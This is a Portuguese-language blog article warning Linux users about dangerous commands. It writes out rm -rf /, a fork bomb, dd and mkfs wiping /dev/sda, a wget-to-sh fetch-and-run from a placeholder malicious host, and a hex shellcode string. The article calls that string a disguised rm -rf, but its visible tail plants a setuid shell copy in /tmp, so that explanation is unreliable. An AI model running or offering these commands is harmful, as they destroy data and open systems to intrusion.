Comandos que podem danificar seu sistema Linux

Comandos que podem danificar seu sistema - Segurança no Linux

Neste artigo vou mostrar diversos comandos e combinações de comandos que são potencialmente perigosos e que podem destruir seu sistema Linux, tornando-o inutilizável completamente (ou parcialmente).

Há uma série de comandos e combinações de comandos que são extremamente perigosos em seu ambiente Linux, especialmente se você utiliza o sistema como usuário root para tarefas normais.

É importante conhecer alguns desses comandos para evitar problemas sérios em seu sistema.

Vamos aos comandos:

rm -rf

O comando rm -rf é uma forma rápida de apagar uma pasta e seu conteúdo. Mas qualquer erro pode resultar em perda de dados - geralmente irrecuperável. Vejamos algumas opções:

rm -r Apaga uma pasta recursivamente

rm -f  Remover arquivos somente-leitura sem perguntar.

rm -rf /  Força a exclusão de tudo no diretório raiz.

rm -rf *  Força a exclusão de tudo no diretório atual.

rm -rf .  Força a exclusão do diretório atual e suas sub-pastas.

:(){ :|:& };:

Esse comando é uma fork bomb. Ele funciona definindo uma função chamada ‘:‘, a qual chama a si mesma duas vezes, uma em foreground (primeiro plano) e outra em background.

Ela continua executando continuamente até congelar o sistema, por falta de recursos.

mv pasta /dev/null

Esse comando moverá ‘pasta‘ para o dispositivo /dev/null.

No Linux, o dispositivo /dev/null ou null é um arquivo especial que descarta todos os dados escritos nele e informa que a operação de escrita foi bem-sucedida.

Exemplo:

# mv /home/ana/* /dev/null

wget http://fontemaliciosa -O- | sh

Esse comando irá baixar um script da Internet, o qual pode estar em uma fonte maliciosa de dados, e então o executará por meio do shell sh.

> arquivo

O caractere > pode ser usado para apagar o conteúdo de um arquivo.

Se esse comando for executado inadvertidamente, como por exemplo “> arquivo.conf”, todo o conteúdo do arquivo arquivo.conf será sobrescrito e, dessa forma, perdido.

dd if=/dev/random of=/dev/sda

Já esse comando irá apagar o dispositivo de blocos sda e escreverá dados aleatórios nele.

Como seu sistema provavelmente está instalado nesse dispositivo, estará perdido e irrecuperável.

mkfs.ext3 /dev/sda

Este comando formata o dispositivo de blocos sda e então o disco terá seu conteúdo totalmente apagado - como se fosse um disco novo.

rm -rf "oculto"

char esp[] __attribute__ ((section(".text”))) /* e.s.p
release */
= "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"
"\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"
"\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7"
"\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"
"\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"
"\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69"
"\x6e\x2f\x73\x68\x00\x2d\x63\x00"
"cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;";

Essa sequência de caracteres toda nada mais é que o comando rm -rf, porém representado em códigos hexadecimais, de modo a enganar quem não conheça esse tipo de representação. Se esse comando for executado no terminal, a partição principal do sistema será totalmente apagada.

Assista a um vídeo de demonstração dos comandos mostrados que podem danificar o sistema Linux para ver o poder destrutivo que eles podem ter:

Sobre Fábio dos Reis (1256 Artigos)
Fábio dos Reis trabalha com tecnologias variadas há mais de 25 anos, tendo atuado nos campos de Eletrônica, Telecomunicações, Programação de Computadores e Redes de Dados. É um entusiasta de Unix, Linux e Open Source em geral, adora Eletrônica e Música, e estuda idiomas, além de ministrar cursos e palestras sobre diversas tecnologias em São Paulo e outras cidades do Brasil.
Contato: Website

Escreva um comentário

Seu e-mail não será divulgado


*